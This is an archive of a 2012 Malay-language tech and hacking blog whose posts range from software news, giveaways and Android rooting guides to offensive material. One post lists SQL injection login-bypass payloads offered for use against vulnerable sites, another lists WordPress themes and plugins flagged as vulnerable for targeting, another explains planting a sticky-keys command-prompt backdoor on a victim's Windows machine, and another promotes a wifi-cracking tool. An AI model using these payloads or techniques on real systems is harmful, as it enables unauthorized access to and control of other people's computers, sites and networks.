30 June 2012

[Giveaway]Lesen percuma 3 bulan ESET


Salam,lama sudah tidak update blog ni..kerana peperiksaan sudah dekat kena la baca buku...lupakan pasal 2..kita kembali kepada topik kita..

Siapa yang tidak kenal ESET SMART SECURITY,ia mempunyai kelebihan tersendiri..ini pendapat luqman,eset merupakan antivirus yang ringan dan tidak mempunyai banyak masalah..kalau anda tidak percaya,anda boleh semak Start Task Manager dan lihat cuma 17 MB..bukan macam antivirus lain banyak songeh(bahasa orang kedah)..

Kepada pencinta ESET hari ini luqman akan memberi lesen percuma 3 bulan (ok la,3 bulan kalau nak beli tak mampu)..

Gambar di atas luqman punya lesen sampai 2014..Jangan cemburu ya...haha..

1.Untuk mendapatkan lesen 3 bulan anda perlu pergi ke laman promosi di
Giveaway
Giveaway
Pilih salah satu yang anda suka..

2.Selepas anda register,Eset akan menghantar lesen anda di email..Untuk download,download di Sini..tengok di kanan anda dan pilih Offline installer..


P/S:ada apa komen di bawah

29 June 2012

Android 4.1 Jelly Bean


Nampaknya ura-ura mengenai versi Android 5.0 dengan kod nama Jelly Bean menjadi 'kurang tepat' apabila Google telah melancarkan lebih awal dengan versi 4.1.

Android 4.1 Jelly Bean tentunya membawakan pembaharuan kepada ciri-ciri Android sedia ada, dan ia dapat dilihat pada model tablet terbaru iaitu Google Nexus 7.

Berikut merupakan video yang menerangkan serba-sedikit ciri-ciri baru atau perubahan yang dapat dilihat pada Android 4.1 Jelly Bean:






Android 4.1 juga dapat dilihat sedang rancak digunakan pada HTC One X:


Anda boleh membaca ciri-ciri baharunya pada laman Android Authority.

Apa yang boleh dikatakan, pembaharuan yang dibuat oleh Google sememangnya ditunggu-tunggu. Android kelihatan lebih kemas, prestasi meningkat dengan interaksi pantas dan paparan antaramuka pengguna grafik juga diperhalusi.

Google Play pada versi 4.1 JB kini lebih pintar apabila memuat turun kemas kini hanya fail kemaskinian sahaja, tanpa memuat turun keseluruhan APK. Ini membantu menjimatkan masa, dan yang paling penting bandwidth!

Project Butter pula memberikan sentuhan kepada kepantasannya. Lagging, pada sistem operasi dapat dilihat minimal dengan penggunaan CPU yang lebih efisien. Sesuai dengan temanya 'as smooth as butter'.

28 June 2012

Sebab Solid-State Drive(SSD) Mahal


Ramai peminat komputer yang tertanya-tanya kenapa harga sebuah solid-state drive (SSD) sangat mahal mengalahkan meriam antik sedangkan hard disk drive (HDD) tu pun hanya iras iras harga gula gula. Sebenarnya banyak sebab kenapa harganya tersangat mahal kerana ia berkaitan dengan teknologi dan juga pengguna itu sendiri.


Mengikut kenyataan Micron yang merupakan pengeluar komponen-komponen semiconductor, SSD mengunakan teknologi NAND Flash yang sangat mahal jika dibandingkan dengan DRAM. Secara ringkasnya, komponen yang digunakan dalam SSD adalah sangat berprestasi tinggi jika dibandingkan dengan yang di gunakan dalam penyimpan data USB ataupun memroy card. Proses pembuatan SSD yang tersangat rumit juga menyumbangkan kepada kenaikan harga kos dan secara tidak langsung menaikkan harga pasaran. Sebagai contoh, SSD perlu menjalani ujian compatiblity dan stability  yang membantu dalam menaikkan kos pembuatan.

Bagi yang pernah mempelajari ekonomi, harga SSD yang seperti lalang itu melambung tinggi berubah mengikut angin prinsip permintaan dan bekalan (demand & supply). Oleh kerana permintaan yang kurang dan pasaran yang suam suam kuku, penjual hanya mendapat keuntungan yang sedikit jadi mereka terpaksa menaikkan harga untuk menampung harga modal. Oleh kerana harga yang tinggi ini, ia menjejaskan kadar permintaan di kalangan pengguna kerana mereka boleh dapatkan storage yang besar dengan harga yang rendah.

Adalah tidak terjangkau keupayaan pengeluar SSD untuk menyaingi pengeluar HDD dalam pasaran komputer peribadi desktop kerana faktor harganya yang mencecah langit menyebabkan pengeluar mencari pasaran yang mempunyai saingan yang rendah iaitu smartphones dan tablet. Rekabentuk smartphone dan tablet yang padat, nipis serta mudah alih itu terpaksa menggunakan SSD sebagai komponen penyimpanan datanya berdasarkan bentuk fizikal SSD yang ramping dan jauh lebih ringan. Kejayaan dalam pelaburan pasaran iPad dan Android membuktikan bahawa pembuatan SSD untuk kegunaan alatan mudah alih lebih untung dari pengeluaran simpanan data untuk komputer peribadi desktop.

Keputusan gergasi pengeluar-pengeluar HDD seperti Western Digital, Samsung dan Seagate untuk mengeluarkan SSD dijangka akan menghangatkan lagi pasaran SSD yang sangat merangkak rangkak. Keputusan ini dibuat kerana prestasi kerja SSD dalam kelajuan proses simpanan datanya yang jauh lebih tinggi dari prestasi HDD.

Sumber

26 June 2012

Anonymous Surfing : Rewritten, Reupload!


Salam semua!

Wooaahaaa! Setelah sekain sekian lama menyepi, now I am back on the track! Sedari pagi saya menulis kembali e-buku yang menjadi permintaan ramai ini telah dipadam oleh Mediafire ini. Letih sungguh rasanya, tetapi berbaloi kerana ia telah diolah semula dengan penulisan yang jauh lebih ringkas tetapi mudah difahami.


Anda tidak punya bahan bacaan yang menarik? Muat turun e-buku ini. Ringkas, padat, penuh dengan info-info dan hanya mempunyai 18 muka surat sahaja. Anda tidak perlu kusutkan kepala dengan e-buku yang tebal tetapi sukar untuk dihadamkan minda.

Buat permulaan, ini adalah sesuatu yang mampu saya sumbangkan setelah sekian lama saya tidak menulis. Tepat pukul 1.00 petang, e-buku ini siap ditulis, dan jika ada sebarang kesalahan ejaan, susun atur, harap dimaafkan.

Maut turun:

1. Minus.com
2. Jumbofiles.com
3. Rapidshare.com
4. Google Drive

No more MEDIAFIRE! Banned forever!!

21 June 2012

SQL Injection By Pass Admin Code


Assalamualaikum dan salam sejahtera kepada para pembaca. Nak Bypass admin guna cara sql injetion? guna je code kat bawah nih, tuh pom kalu vuln.



' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

20 June 2012

Senarai Tema yang Vuln


Assalamualaikum dan salam sejahtera kepada para pembaca. Lama dah aku tak tulis entri. Hari nih aku just nak share senarai themes yang vuln untuk wordpress sahaja.

     portfolio-slideshow-pro
     wp-mobile-detector
    a-wp-mobile-detector
    igit-related-posts-with-thumb-images-after-posts
    dukapress
    verve-meta-boxes
    db-toolkit
    logo-management
    wp-marketplace
    islidex
    aio-shortcodes
    category-grid-view-gallery
    WPFanPro
    igit-posts-slider-widget
    wordpress-gallery-plugin
    cms-pack
    Premium_Gallery_Manager
    dp-thumbnail
    placid-slider
    nivo-slider
    photoria
    LaunchPressTheme
    kc-related-posts-by-category
    journalcrunch
    download-manager
    wordpress-thumbnail-slider
    sugar-slider
    optimizepress
    Minimo
    Polished
    Minimal
    nebula
    TheCorporation
    TheStyle
    TuaranBlog
    striking
    MyCuisine
    AskIt
    Webly
    Aggregate
    TheSource
    reviewit
    kelontongfree
    Mentor
    SimplePress
    journalcrunch
    ecobiz
    Magnificent
    timthumb.php
    Olympia
    kingsize
    Chameleon
    DelicateNews
    videozoom-v2.0-original
    videozoom
    Envisioned
    twicet
    u-design
    genoa
    OptimizePress
    Modest
    mocell
    ephoto
    Theme
    InReview
    lightpress
    hostme
    PersonalPress
    Cadca
    arras
    tiwinoo_v3
    MyProduct
    sc4
    InterPhaseTheme
    InStyle
    LightBright
    TheProfessional
    mnfst
    freshnews
    ArtSee
    Boutique
    eStore
    Avenue
    twentyten
    XSWordPressTheme
    adcents
    Nova
    MyPhoto
    eGallery
    Striking_Premium_Corporate
    default
    Lycus
    manifesto
    cold
    DynamiX
    tarnished
    Nyke
    linepress
    DJ
    adria
    zimex
    peano
    ElegantEstate
    delight
    kelontong-free
    duotive-three
    SobhanSoft_Theme
    PureType
    yamidoo_pro
    vulcan2.1
    eGamer
    Wooden
    peritacion
    AmphionPro
    trinity
    dandelion_v2.6.3
    Juggernautgrande
    juggernaut-theme
    BlackLabel_v1.1.2
    Feather
    reviewit1
    zinepress_v1.0.1
    tribune
    photoria
    vilisya
    DailyNotes
    Basic
    minerva
    anthology_v1.4.2
    ModestTheme
    purevision
    parquet
    framed-redux
    eceramica
    InterPhase
    epsilon
    Striking
    thedawn
    peava
    Newspro
    telegraph
    averin
    telegraph_v1.1
    Memoir
    NewsPro
    CircloSquero
    vassal
    maxell
    13Floor
    wpanniversary
    OnTheGo
    Glider
    mohannad-najjar222
    mohannad-najjar2
    arthemia
    tuufy7
    photoframe
    beach-holiday
    blacklabel
    cadabrapress
    snapwire
    bizpress
    themesbangkoofree
    TOA
    D4
    eNews
    vulcan
    overtime
    rockwell_v1.0
    vicon
    wideo
    CherryTruffle
    mio
    rttheme13
    Linepress
    DeepFocus
    advanced-newspaper202
    OptimusPrime
    Quadro
    Lumin
    minima
    identity
    U-design.v1.1.2_hkz
    KP
    Petra
    services
    13FloorTheme.php
    BD
    PolishedTheme
    13FloorTheme
    kiwinho
    graphix
    jerestate
    centro
    corage
    Reporter
    TheTravelTheme
    XSBasico
    openhouse
    seosurfing1
    bluebaboon
    Newspro-2.8.6
    nd
    zoralime
    GrupoProbeta
    eBusiness
    purplex
    kitten-in-pink
    FashionHouse
    WhosWho
    Deviant
    Bold
    BusinessCard
    EarthlyTouch
    GrungeMag
    LightSource
    Simplism
    TidalForce
    Glow
    Influx
    StudioBlue
    jpmegaph
    redina
    tritone
    dandelion_v2.5
    Bluesky
    ColdStone
    silveroak
    newspro
    GamesAwe
    caratinga.net
    SimplePressTheme
    MyResume
    MyApp
    theme
    bigcity
    dandelion_v2.6.1
    chronicle
    cuizine
    thesis_18
    advanced-newspaper_new
    Event
    wpbedouine
    rt_affinity_wp
    arry12
    backup-TheStyle
    ExploreFeed
    zzzzzzzzz
    Bluemist
    Hermes
    cleartype_v1.0
    polariswp
    Chameleon 1.6
    sniper
    adena
    ariela
    FreshAndClean
    wp-creativix

19 June 2012

MacX DVD Ripper Pro (Free License Key for MAC + Windows Version)



Assalamualaikum dan selamat sejahtera kepada warga omgHackers..Mintak maaf la kepada Mr.hac lama tidak update kerana peperiksaan sudah dekat...

MacX DVD Ripper Pro adalah perisian yang akan menukarkan Video-DVD anda ke pelbagai format video...Perisian ini amat mudah untuk digunakan dan butang setiap intuitif, hanya masukkan cakera dan biarkan perisian mengimbas ia...senagkan..

Ia menukarkan DVD kepada format yang digunakan seperti  Mp4, iTunes, MOV, Music (mp3), MPEG, FLV; atau format seperti iPhone, iPod, iPad, Apple TV, PSP dan AVI...Masa penukaran bergantung prestasi anda Mac, percuma OS sumber dan format yang anda menukar ke...


Giveaway:
1.Giveaway ini akan tamat pada 30 jun ni..guna lah peluang ni dengan baik..hehe
2.Sila ke laman promosi untuk mendapatkan lesen di Sini..


18 June 2012

Mencipta Backdoor Di Sistem Operasi Windows


Assalamu'alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Sebagai contoh anda telah berjaya masuk ke komputer mangsa dan anda anda ingin membuat backdoor pada komputer mangsa. Jadi bagaimanakah caranya? Caranya adalah dengan mengubah kedudukan command prompt ke tempat sethc.exe. Apakah sethc.exe ini?



sethc.exe is a process associated with Windows NT High Contrast Invocation and is part of Microsoft Windows Operating System. With default Windows settings, this process is run when the shift is pressed 5 times in sequence, to invoke the StickyKeys configuration window.

http://www.processlibrary.com/directory/files/sethc/28697/


Jadi di sini apa yang kita semua faham adalah apabila kita menekan "shift" untuk 5 kali berturut-turut akan keluarnya StickyKeys. Jadi apa kaitannya dengan command prompt adalah apabila kita menukarnya, command prompt yang akan keluar apabila kita menekan "shift" secara berturut-turut selama 5 kali.

Ya! Sebagaimana yang kita tahu, command prompt adalah eset amat penting dalam komputer. Jika kita dapat menggunakannya, ianya seperti kita mengawal sepenuhnya komputer tersebut. Anda boleh mengubah password mangsa tanpa mengetahui password mangsa semasa anda ingin login komputer tersebut.

Anda boleh melihat video di bawah ini untuk mengetahui bagaimana cara untuk melakukannya :



Segala apa yang diajar hanya untuk tujuan pembelajaran. Jika ingin menlakukannya, lakukannya di komputer milik anda sahaja. Lakukannya pada komputer orang lain adalah salah disisi undang-undang. Risiko anda tanggung sendiri. Saya tidak bertanggungjawab atas apa yang berlaku semasa anda melakukannya. Jadi senang cerita anda boleh mempraktikkannya di virtual machine milik anda! =)

Sekian.

17 June 2012

Airoscript-ng Dicipta Untuk Godam Wifi


Assalamu'alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Maaf. Buat masa ni saya tumpukan pada entri lain dahulu ya. Baiklah. Hari ini kita semua akan mendalami lagi program-program yang terdapat dalam BackTrack 5.

Airoscript-ng adalah satu tool dimana ianya menggabungkan pelbagai tool dan menjadikannya satu program antaranya Aircrack-ng. Apakah Airoscript-ng ini? Ianya adalah program untuk menggodam wifi. Bagi mereka yang tidak tahu mengenai Airoscript-ng ini, anda boleh mencarinya di dalam BackTrack milik anda :

Applications >> System Tools >> Airoscript-ng @ Airoscript-ng GTK




Perbezaan anatara Airoscript-ng dan Airoscript-ng GTK adalah paparan antaramukanya. Untuk Airoscript-ng ianya Command User Interface manakala Airoscript-ng GTK pula adalah Graphic User Interface. Tetapi sebenarnya kedua-duanya adalah text-user interface. Ianya hanyalah text tanpa ada satu gambar pun. Jadi ikut kepada keselesaan anda untuk menggunakan yang mana satu ya. Pelbagai cara serangan anda boleh lakukan seperti chopchop, fragmentation attack, fakeauth, deauth, dictionary attacks dan WPA cracking.


Airoscript-ng



Airoscript-ng GTK


Bagi mereka yang kurang rajin itu, tool ini sangat sesuai untuk anda. Anda hanya perlu mengikut saja arahan yang di suruh dan jika betul caranya, mungkin anda akan berjaya menggodam wifi!

Anda boleh belajar menggunakannya di pelbagai laman web antaranya di evilzone.org.

Sekian.

15 June 2012

Skype™ 4.0 for Linux


Skype versi 4.0 telah dilepaskan untuk sistem operasi Linux.

Quote dari laman blog rasmi Skype:

You will find four major changes in this release:
1. We have a new Conversations View where users can easily track all of their chats in a unified window. Those users who prefer the old view can disable this in the Chat options;
2. We have a brand new Call View;
3. Call quality has never been better thanks to several investments we made in improving audio quality; and
4. We've worked on improving video call quality and have also extended support for more cameras. 
Of course, we have loads of other small improvements and fixes. As you can imagine, the list is so long it would take too much time to write it all, but some are worthy of mention:
  • improved chat synchronization
  • new presence and emoticon icons
  • the ability to store and view phone numbers in a Skype contact's profile
  • much lower chance Skype for Linux will crash or freeze
  • chat history loading is now much faster
  • support for two new languages: Czech (flag:cz) and Norwegian (flag:no)





Yeah. Rilisan beta sudah melalui fasa akhirnya dan rilisan stabil mengambil alih kedudukan. Skype untuk Linux adalah perkara yang ditunggu-tunggu, dan jika anda sedang menggunakan sistem operasi Linux sambil membaca entri ini, saya pasti anda sememangnya teringin untuk mencuba.
Jadi anda boleh muat turun Skype 4.0 untuk Linux di sini : Skype for Linux

Sedikit nota, pada pautan muat turun itu tidak terdapat versi untuk Ubuntu 11.04 sehingga 12.04, tetapi pakej pemasang yang diberikan adalah serasi (compatible), jadi anda cuma perlu muat turun sahaja dan terus pasangkannya. Untuk memudahkan pemasangan, gunakan gdebi.

Opera 12 Rilisan Stabil Dilepaskan


Opera adalah sebuah pelayar web. Err.. Semua orang tahu tu kan?
Tetapi berapa ramai orang yang tahu Opera adalah pelayar web yang telah banyak 'mengasaskan' ciri-ciri istimewa yang akhirnya disalin tampal oleh pelayar web lain seperti Speed Dial, 'Paste and Go', Privacy Control, Mouse Gestures dan sebagainya lagi.

Opera 12 telah dilepaskan dan membawakan beberapa lagi ciri yang menarik untuk digunakan.


Antara yang boleh dilihat secara jelas ialah URL bar yang kini menyokong fungsi senarai carian 'drop-down' dan sejarah carian apabila anda menaip sesuatu kata kunci padanya:


Tak lupa juga dari versi sebelumnya iaitu Opera Next 12, Opera 12 kini menyokong fungsi ubahan tema. Anda boleh memasang tema yang diingini pada pautan ini : Opera Themes
Walaupun masih belum cukup banyak pilihan, tetapi dapat dijangkakan tidak lama lagi ia pasti akan bertambah dan akan menjadi lebih banyak dalam jangka masa beberapa bulan dari sekarang.



Opera 12 boleh dimuat turun untuk Windows, Mac dan Linux pada pautan ini : Opera Browser

14 June 2012

Audience Video Player


Pemain video ini adalah antara pemain video untuk sistem operasi Linux yang paling ringkas saya pernah cuba dan gunakan. Sangat ringkas, tetapi berkesan dalam memainkan pelbagai format video dengan baik. Berikut dipaparkan video yang menunjukkan anda betapa ringkasnya Audience.



Pemain video ini masih belum mencapai tahap stabil lagi. Jadi jika anda ingin memasangnya untuk mencuba, sila ke laman Web Upd8 untuk mendapatkan tutorial cara pemasangan.

Pasang Apt-Fast Pada Ubuntu [PPA]


Apt-fast ialah ialah skrip yang menggabungkan pemuat turun Axel dan juga apt-get. Kini versi terbarunya iaitu 1.6 telah dirilis. Anda boleh pasangkan apt-fast pada Ubuntu atau distro terbitan darinya melalui baris perintah dengan menggunakan PPA.

1. Buka Terminal dan masukkan baris perintah berikut:
sudo add-apt-repository ppa:apt-fast/stable
sudo apt-get update
sudo apt-get install apt-fast axel
2. Kemudian, masukkan baris perintah ini:
gksu gedit /etc/apt-fast.conf
Paparan seperti di bawah akan keluar. Uncomment (buang tanda #) pada axel:


3. Setelah itu, masukkan pula baris perintah ini:
sudo mkdir /var/cache/apt/archives/apt-fast
Selesai. Anda kini sudah boleh menggunakan apt-fast untuk memasang pakej atau perisian yang anda mahu. Silakan mencuba.

Update:

Mr.Hac telah mencuba memasang beberapa aplikasi menggunakan apt-fast, namun gagal dilancarkan (command not found). Jadi apa yang boleh kita harapkan selepas memasang aplikasi ini ialah semoga pembangunnya mengemaskini kod sumber supaya ia dapat digunakan dengan sempurna.

Update 2:

Semua masalah pemasangan sudah selesai. Sekarang apt-fast dapat digunakan dengan cemerlang!

13 June 2012

[Tutorial] Menggunakan DNS Tunlr Pada Ubuntu/Linux (Tonton Hulu Dari Luar US)


Atas permintaan dari seorang pembaca, Mr.Hac mengemaskini pos sebelumnya iaitu Cara Tonton Hulu Dari Luar US Tanpa Menukar IP. Bagi pengguna Ubuntu atau mana-mana sistem operasi Linux yang menggunakan tetapan seakan dengannya, maka anda boleh gunakan tutorial ini untuk mengubah tetapan DNS pada sistem operasi anda.

Mudah saja caranya!

Anda ikut sahaja langkah-langkah yang ditunjukkan pada gambar di bawah. Walaupun Mr.Hac menggunakan Elementary OS Luna, tetapi menu untuk membuka tetapan rangkaian pada Ubuntu sepatutnya tidak jauh berbeza.

Cara Pertama (GUI):

1. Buka tetapan untuk mengubah DNS pada rangkaian anda dengan mengklik pada 'Edit Connections...'.


2. Klik (untuk highlight) pada rangkaian anda dan klik 'Edit...'


3. Klik pada 'Automatic (DHCP) addresses only' dan masukkan DNS Tunlr pada ruangan 'DNS servers' dengan dipisahkan oleh 'koma'. Contohnya:
148.154.158.186, 199.167.30.144

Cara Kedua:

Anda boleh gunakan cara ini sekiranya anda jenis 'pening' dengan GUI (ada ke orang macam ni?).

1. Buka Terminal dan masukkan baris perintah di bawah:
sudo vi /etc/resolv.conf
2. Jika terdapat baris nameserver default pada resolv.conf ini, sila catatkannya untuk tujuan rujukan pada masa akan datang.

3. Gantikan atau tambah pada baris nameserver itu baris berikut:

nameserver 149.154.158.186
nameserver 199.167.30.144

4. Simpan dan keluar (save and exit). Mulai semula rangkaian anda.

5. Seperti biasa periksa status DNS anda di sini : Status | tunlr.net

Bukti:


Elementary OS Luna Beta-1 Bakal Dirilis


Salam semua.

Rasanya agak lama juga Mr.Hac tidak menulis mengenai sistem operasi Linux. Kali ini saya ingin membuat sedikit pengumuman bahawa Elementary OS Luna Beta-1 bakal dirilis tidak lama lagi! Buat mereka yang masih belum mengetahui atau masih kurang jelas mengenai sistem operasi ini, sila baca reviu sebelum ini mengenainya di sini : Pra Tonton Teknologi Elementary OS Luna [Download Daily Build ISO]

Jika anda sukakan kelajuan, kelancaran, kebolehan untuk mengubah suai hampir apa sahaja pada sistem operasi Linux tetapi tidak mahu pening kepada dengan masalah untuk memasangnya seperti sukarnya memasang Arch Linux, maka Elementary OS Luna adalah jawapan yang tepat dan terbaik.

Ia didatangkan bersama dengan kelajuan yang telah ditingkatkan, dan juga bersama beberapa aplikasi asas yang mana jika anda rasa ia tidak mencukupi atau tidak memenuhi kehendak anda, anda boleh pasangkan perisian atau aplikasi yang baru.

Untuk pengetahuan anda, terdapat beberapa perubahan ketara yang dapat dilihat pada Elementary OS Luna iaitu Files telah menggantikan (fork) Marlin, iaitu aplikasi pengurus fail dan Noise telah menggantikan Beatbox, pemain muzik default bagi Elementary OS. Berkemungkinan nama 'Noise' itu bakal ditukar apabila rilisan stabil dilepaskan kepada pengguna (mungkin). Tak lupa juga Plank iaitu dock pada Elementary OS telah menyokong fungsi seret dan lepas (drag and drop).

Berikut Mr.Hac paparkan beberapa paparan skrin (screenshot) Elementary OS Luna Daily Build rilisan terbaru. Anda boleh jangkakan rilisan beta-1 tidak akan jauh bezanya dari paparan ini. Sila klik pada gambar untuk paparan yang lebih jelas.

Slingshot Launcher


Noise (Fork Kepada Beatbox)

Files (Fork kepada Marlin File Manager)

Sokongan Fungsi Drag and Drop Pada Plank

12 June 2012

Faedah Rooting/Root Telefon Pintar Android


Salam semua.

Seperti dijanjikan, artikel hari ini akan menceritakan mengenai faedah atau kebaikan 'rooting' smartphone android yang telah dimiliki oleh anda. Ini bagi menjawab persoalan kepada sesiapa yang masih tertanya-tanya apakah faedah yang boleh didapati jika pemilik android telah pun berjaya root smartphone mereka itu. Jika anda golongan yang telah tahu mengenainya, anda boleh cari artikel lain dari blog ini untuk dibaca atau sila tambahkan faedah-faedah lain yang dapat anda fikirkan pada ruangan komen. Terima kasih.

Apa Itu Root?

Menjadikan telefon pintar android anda untuk mendapat 'root access' ialah sebuah proses memodifikasi sistem operasi android untuk memperoleh akses penuh terhadapnya. Apa jua limitasi yang didatangkan sekali dengan telefon pintar tersebut akan 'dihilangkan' sepenuhnya.

Istilah 'root' ini datang dari sistem operasi Linux, di mana akaun pentadbir (Administrator) yang mempunyai akses penuh terhadap sistem operasi digelar sebagai root. Berikut disenaraikan faedah-faedah yang akan diperolehi selepas anda selesai rooting telefon pintar anda.

Faedah-faedah Root:

1. Kawalan Penuh Terhadap Sistem Operasi

Dengan adanya akses penuh, ini bererti anda mempunyai kawalan penuh kepada sistem operasi android. Anda akan dapat menyah-pasang aplikasi yang tidak diperlukan, yang biasanya didatangkan sekali dengan telefon pintar, menggunakan tema dan sebagainya.


2. Membuat Salinan Sandaran dan Memulihkan Sistem

Salinan sandaran (back up) adalah sangat penting kerana seandainya terjadi sesuatu kepada telefon pintar anda, anda dapat mengembalikan atau memulihkan semula (restore) sistem kepada keadaan asalnya. Ini cuma dapat dilakukan pada rooted android.

3. Menjalankan Aplikasi 'Istimewa'

'Istimewa' di sini bermaksud aplikasi yang hanya dapat dijalankan pada peranti yang sudah pun mendapat root access. Sebagai contoh aplikasi yang terkenal seperti Titanium Backup, MyBackup Root, SetCPU, WiFi Tether, ROM Manager dan sebagainya.

4. Flash/Install Custom ROM

ROM ialah sistem operasi android yang mewakili paparan antaramuka dan juga fail-fail sistem. Custom ROM dapat diterjemahkan kepada sistem operasi android yang telah diubah suai (modified) untuk mendapatkan prestasi 'sebenar' pada peranti seperti meningkatkan kuasa bateri, mengubah suai paparan antaramuka, memasukkan pelbagai tweaks yang hanya boleh digunakan oleh rooted phones, dan bla bla bla.

5. Flash Custom Kernel

Terdapat pelbagai jenis kernel yang menawarkan pelbagai keistimewaan. Disebalik kernel asal yang kadang kala terdapat bugs yang menjengkelkan, custom kernel menawarkan kernel yang sudah diperbaiki dan ditingkatkan 'kuasanya' supaya dapat berinteraksi dengan lebih baik pada peranti.

Namun harus diingatkan, rooting telefon pintar android anda akan membatalkan waranti! Anda lakukan hanya apabila anda betul-betul telah bersedia dan faham akan kelebihan dan kepentingannya, kerana jika tersilap langkap, risiko bricking telefon anda adalah tinggi melainkan anda ikut 100% seperti tutorial!

The dragons lie ahead. You have been warned.

Rujukan (Utama):

[Updated] Rooting Explained + Top 5 Benefits Of Rooting Your Android Phone

11 June 2012

[Tutorial] Tonton Hulu Dari Luar US Tanpa Menukar IP


Sebagai mana yang kita ketahui, terdapat beberapa servis video streaming yang hanya boleh ditonton dari 'dalam' Amerika Syarikat (US) seperti tonton.com.my Hulu.com dan Netflix. Jika anda mengubah IP anda kepada IP US, barulah anda akan dapat menikmati servis tersebut.

Tetapi terdapat satu cara yang lebih mudah iaitu dengan mengubah DNS anda kepada DNS Tunlr, sebuah servis yang menawarkan cara mudah untuk menonton Hulu.com dan lain-lain video streaming sepertinya dari luar US tanpa perlu menukar IP. Cukup sekarang menukar DNS dan anda boleh terus menonton.

Caranya mudah. Anda cuma perlu ikut sahaja tetapan DNS seperti gambar di bawah:


Preferred DNS server : 149.154.158.186
Alternate DNS server : 199.167.30.144

Kemudian, semak status anda di sini : Status | tunlr.net


Bukti:


SUMBER : tunlr.net

Cara Root HTC One X


Salam semua.

Kali ini Mr.Hac ingin berkongsi cara untuk root HTC One X. Bagi pemilik peranti ini, jika anda ingin melakukannya, sila lakukan atas risiko anda sendiri! Saya tidak akan bertanggungjawab atas kecuaian anda sekiranya berlaku apa-apa.

Ini adalah cara yang saya sendiri gunakan. Jadi disebabkan telah terjamin keberkesanannya, dan jika anda melakukannya 100% mengikut video tutorial, kebarangkalian untuk risiko bricking adalah sangat rendah.

Bagi yang tidak tahu apa kegunaan root untuk Android, Mr.Hac akan tulis pos berasingan untuk menjelaskan kepada anda apa faedah yang anda dapat jika anda 'root' smartphone anda.

Perkara Perlu Dilakukan :

1. Unlock Bootloader
2. Root HTC One X

Mari kita teruskan dengan perkara pertama, iaitu unlock bootloader.


Langkah-langkah yang dibuat:

1. Pergi ke laman HTCdev.com dan daftarkan satu akaun
2. Setelah daftar dan sahkan akaun anda melalui e-mel, sila klik pada Unlock Bootloader -> Get Started


3. Seterusnya klik pada Select Your Device dan pilih All Other Supported Models

4. Klik Begin Unlock Bootloader

5. Ikut arahan yang tertera pada skrin (tonton video 1/2 di atas untuk memahami langkah-langkah yang disebutkan).

Root HTC One X:


Langkah-langkah yang dibuat:

1. Anda perlu muat turun dahulu fail fastboot di sini : fastboot.rar
2. Ekstrak fail tersebut (dengan menggunakan WinRAR atau mana-mana perisian setara).
3. Salin fail CWM-SuperSU-v0.89.zip ke dalam sdcard One X anda. Untuk melakukannya, anda perlu sambungkan One X kepada komputer dengan menggunakan kabel USB dan tukar status kepada Disk drive.
4. Setelah selesai menyalin, tukar status Disk drive kepada Charge only.
5. Buka command prompt dengan menekan butang berlogo Windows + R dan taipkan 'cmd' lalu tekan Enter. Halakan command prompt pada folder fastboot.


6. Masuk kepada Bootloader dengan menekan secara serentak butang Power + Volume Down. Jangan lepaskan kedua-dua butang itu sehingga anda melihat bootloader. Pilih FASTBOOT dan tekan butang Power.
7. Taipkan fastboot flash recovery recovery-clockwork-touch-5.8.4.0-endeavoru.img dan tekan Enter. Ini akan memasang ClorkworkMod Touch Recovery versi terbaru pada waktu pos ini ditulis.
8. Untuk memudahkan kerja, anda boleh namakan semula fail itu kepada recovery.img sahaja. Jadi baris perintahnya adalah fastboot flash recovery recovery.img. Faham kan?
9. Dalam video yang disediakan di atas, ada satu lagi langkah yang beliau terlupa hendak nyatakan iaitu selepas selesai anda flash recovery, sila masukkan baris perintah yang PENTING ini untuk mengelakkan sebarang ralat:

fastboot erase cache

10. Masuk ke mode RECOVERY. Sila tonton video 2/2 untuk melihat kaedahnya (minit ke 3:03)
11. Navigasi ke arah install zip from sdcard -> choose zip from sdcard -> Pilih CWM-SuperSU-v0.89.zip dan tekan butang Power.
12. Pilih Yes - Install CWM-SuperSU-v0.89.zip dan tekan butang Power (Jika CWM menyokong fungsi sentuhan, anda cuma perlu menyentuh sahaja pilihan yang disebutkan).
13. Go Back -> reboot system now
14. Masuk Play Store dan sila pasangkan Busybox! Penting dan WAJIB untuk digandingkan dengan SuperSU!
15. Sekarang HTC One X anda sudah pun berjaya di-root! Anda boleh cuba mana-mana apps yang memerlukan root untuk memastikannya atau anda boleh pasangkan Root Validator untuk memeriksa status root anda.

Tahniah! Unlocked and Rooted!

My Phone: HTC One X [Unlocked. Rooted]
ROM: InsertCoin Evolution 6.4.5
Kernel: Bricked 0.3 with Sweep2Wake
CPU: NVIDIA Tegra 3 - 1.5 GHz quad-core
Firmware: 1.29.401.11
Recovery: CWM Recovery (Touch) 5.8.4.0



08 June 2012

Penciptaan Virus Terbaru "Flame"


 Assalamualaikum dan salam sejahtera kepada pembaca sekalian,
Virus terbaru yang dinamakan sebagai “Flame” kini mula merebak ke beberapa negara maju terutama Iran, Israel, Palestina, Sudan, Lebanon, Arab saudi dan Mesir. Virus ini dikatakan lebih canggih dan berupaya untuk melalukan pelbagai jenis serangan pada sesebuah komputer.

Antara kemampuan yang boleh virus Flame lakukan :

Dapat mengambil semua data yang disimpan oleh komputer apabila telah dijangkiti.
Dapat melihat sepenuhnya aktiviti yang dijalankan oleh sesebuah komputer dengan cara mengambil gambar screen, merakam semua aktiviti keyboard dan sebagainya.
Dapat mengaktifkan sistem audio komputer, microfon dan mampu untuk mencuri dengar segala berbualan pengguna kompoter.
Mengganggu pengguna lain.
Virus Flame ditemukan pertama kali oleh tim Kaspersky Lab, yang merupakan suatu perusahaan keamanan komputer di Rusia. Disebabkan pembinaan virus Flame yang lebih kompleks tiada antivirus yang mampu mengesan kehadirannya buat masa ini.

Mengikut hasil pembacaan saya, virus ini hanya mampu dihasilkan oleh negara maju kerana strukturnya yang lengkap. Sesetengah dari kita ada yang membuat kesimpulan dengan mengatakan ianya virus yang telah dicipta oleh Israel.

